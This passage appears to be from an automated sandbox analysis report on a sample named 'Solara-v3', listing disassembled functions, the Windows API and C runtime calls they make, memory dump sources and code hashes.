                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2a11a4c7a45d48da7f3ff96574ac33ec8b5cfcc4cc4f264c0fd36bed022cdc5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4E01A30780204BAEF201BA0ED06FAD3A55AB40B92F140420FA4DE89E0DB75ED949944
                                                                                                                                                                                                                                              Function 00CB3F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00CB4001
                                                                                                                                                                                                                                                • Part of subcall function 00CAC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CAD895,?,00000000,-00000008), ref: 00CAC082
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CB4253
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CB4299
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CB433C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2112829910-0
                                                                                                                                                                                                                                              • Opcode ID: 328bc223fe6a8756ff43bf0a937990e0952ee323e8b0ae6c386f1d851a9bd3e0
                                                                                                                                                                                                                                              • Instruction ID: 77ecb9d2c7a7597355393b3cbce207d932488c21bd7d145093db708d96324da2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 328bc223fe6a8756ff43bf0a937990e0952ee323e8b0ae6c386f1d851a9bd3e0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71D15A75D042589FCF19CFE9D880AEDBBB9FF09314F18412AE566EB252D630A941CB50
                                                                                                                                                                                                                                              Function 00CAB295 Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                                                                                              • Opcode ID: 9124b7e44398a2f01ea0864fb073a9aaa4e561b437c15c27ad96f1dc0e0dd8ed
                                                                                                                                                                                                                                              • Instruction ID: 450d55fe9607930354861d8b817f0ff41387bb9a2790f15b2f510a67495ce40d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9124b7e44398a2f01ea0864fb073a9aaa4e561b437c15c27ad96f1dc0e0dd8ed
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5551F571602607EFDF248F50C981BBA77A4EF02718F24412DE916872A3DB31EE50DB90
                                                                                                                                                                                                                                              Function 00C97220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C972C5
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C97395
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C973A3
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C973B1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2261580123-0
                                                                                                                                                                                                                                              • Opcode ID: d1650e2014a9684414ad8a8c686be54ccd194fa859a1ec5f008cdad3c952527c
                                                                                                                                                                                                                                              • Instruction ID: 04e8f5fbeaa01dd01172b780450d045b7c1986828ef834f7bc963cc8a25d8224
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1650e2014a9684414ad8a8c686be54ccd194fa859a1ec5f008cdad3c952527c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B41F2B1A04705DBDF20EB64C949BAEB7A5FF44320F144639E82A476A1EB34E910DBD1
                                                                                                                                                                                                                                              Function 00C94460 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C94495
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C944B2
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C944D3
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C94580
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              • Opcode ID: dbab324ea70ae2a0c3f456817f25f33f9732aa9497c4e73c3801cd0aed35e1c3
                                                                                                                                                                                                                                              • Instruction ID: f4cf9b82a8d9a09a4ee5bdf917a0f72f0d93d3fc1f421d25396b762294f5bb46
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbab324ea70ae2a0c3f456817f25f33f9732aa9497c4e73c3801cd0aed35e1c3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7414B71D002598FCF14DF94D888BAEBBB0FB48724F054269E819A7391D734AE56CFA1
                                                                                                                                                                                                                                              Function 00CB1DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CAD895,?,00000000,-00000008), ref: 00CAC082
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00CB1E2A
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00CB1E31
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00CB1E6B
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00CB1E72
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1913693674-0
                                                                                                                                                                                                                                              • Opcode ID: ca398a1c3e0b87d4c18583233c71d902355ecdd06eb1c9ecacc62be34100d2a4
                                                                                                                                                                                                                                              • Instruction ID: c43c7d6e54cfe91936300db3a53c94748a4ad5d0d6f078d1436feb88670222a7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca398a1c3e0b87d4c18583233c71d902355ecdd06eb1c9ecacc62be34100d2a4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D121D031600256AFCB20AF66CC989ABB7A8FF01369F588519FC29D3100D730ED00DBA0
                                                                                                                                                                                                                                              Function 00CA2BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7ae1eec4ef924f7fb6ce9dfcf6e2f0de0d47cfd5eedbee519d8c04532e5f7b0b
                                                                                                                                                                                                                                              • Instruction ID: bbc0e8f0a31bd1b24c0697e88618e1bf75938c08749a156950e2a384739fb84b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ae1eec4ef924f7fb6ce9dfcf6e2f0de0d47cfd5eedbee519d8c04532e5f7b0b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39219D71204227AFAB21AF7DDC80E6E77A9FF4236CB104515F86597250EB30ED40A7A0
                                                                                                                                                                                                                                              Function 00CB31BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00CB31C6
                                                                                                                                                                                                                                                • Part of subcall function 00CAC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CAD895,?,00000000,-00000008), ref: 00CAC082
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CB31FE
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CB321E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 158306478-0
                                                                                                                                                                                                                                              • Opcode ID: e618f44ad604426377fad387288dd6fa6e91fc818d7f8a4afdfa26c19411d79d
                                                                                                                                                                                                                                              • Instruction ID: d4a7f140d785955e6ff7d9a06ef1a926ad7b013d89f7acd3313473fc3b2a480e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e618f44ad604426377fad387288dd6fa6e91fc818d7f8a4afdfa26c19411d79d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E011D2B1A011567EA72127B69D8ADFF6A5CDE9A398B100024FA01D2103FF64EF0092B2
                                                                                                                                                                                                                                              Function 00C9E892 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C9E899
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C9E8A3
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00C9E8BA
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00C9C1F6
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00C9C210
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C9E914
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1383202999-0
                                                                                                                                                                                                                                              • Opcode ID: 313935537e81f86a60b6f9cf9507f54da14f46f9b7ace91bccba5a1b0eabfb12
                                                                                                                                                                                                                                              • Instruction ID: 1e479f88672ca5044d0361c0893245240be935cc184f649c94b40198e26c082c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 313935537e81f86a60b6f9cf9507f54da14f46f9b7ace91bccba5a1b0eabfb12
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 731100318002199BCF05EBA4C98DBBDBBB1AF94320F260008E415AB292CF309F40EB81
                                                                                                                                                                                                                                              Function 00CBADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000), ref: 00CBADB7
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000,?,?,?,00CB3CD6,00000000), ref: 00CBADC3
                                                                                                                                                                                                                                                • Part of subcall function 00CBAE20: CloseHandle.KERNEL32(FFFFFFFE,00CBADD3,?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000,?,?), ref: 00CBAE30
                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 00CBADD3
                                                                                                                                                                                                                                                • Part of subcall function 00CBADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CBAD91,00CBA2DC,?,?,00CB4390,?,00000000,00000000,?), ref: 00CBAE08
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000,?), ref: 00CBADE8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                                                              • Opcode ID: 56b4fca180dbced48009237d6d080c228d2a5ada0e073c4373e6c7ca29b511a3
                                                                                                                                                                                                                                              • Instruction ID: 36cd59df7e5d65f3a35238a66f67f294a379c6e1b0e22f8c9bdb178db6ae4cf6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56b4fca180dbced48009237d6d080c228d2a5ada0e073c4373e6c7ca29b511a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF0AC36504129BBCF221FE5EC08FDE7F26FF48BA1F044411FA5996121DB32C9A0AB91
                                                                                                                                                                                                                                              Function 00CA04F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CA0507
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00CA0516
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00CA051F
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00CA052C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: 56487f52023a03b4ee6d0d938840174c2bd46c1baf5d0e443e2cf2e79744514c
                                                                                                                                                                                                                                              • Instruction ID: 566d912549050a2ccc5e65d3fddfefa246a6c5de54c64c4a656ecac088534247
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56487f52023a03b4ee6d0d938840174c2bd46c1baf5d0e443e2cf2e79744514c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F06274D1020DEBCB00DFB4DA89A9EBBF4FF1C200B914995E412E7110EB34AB449B50
                                                                                                                                                                                                                                              Function 00CB0976 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(00000000,?,00CAE58D), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000,?,?,00000028,00CA8363), ref: 00CAC210
                                                                                                                                                                                                                                              • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00CA5BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00CB0A35
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00CA5BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00CB0A6C
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                              • String ID: utf8
                                                                                                                                                                                                                                              • API String ID: 943130320-905460609
                                                                                                                                                                                                                                              • Opcode ID: 686b1eb4db7de628675a05c32164c5a415e9dd84b03f5ad375647c79045bc3dd
                                                                                                                                                                                                                                              • Instruction ID: d0e4c21f50515673b77fa32208170047b5ff5417626af9c55c80d5fd861b2dd6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 686b1eb4db7de628675a05c32164c5a415e9dd84b03f5ad375647c79045bc3dd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB51E831A40705ABDB24AB75CC82FFB73A8EF05704F344829F56697182F670EA40E765
                                                                                                                                                                                                                                              Function 00C973E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
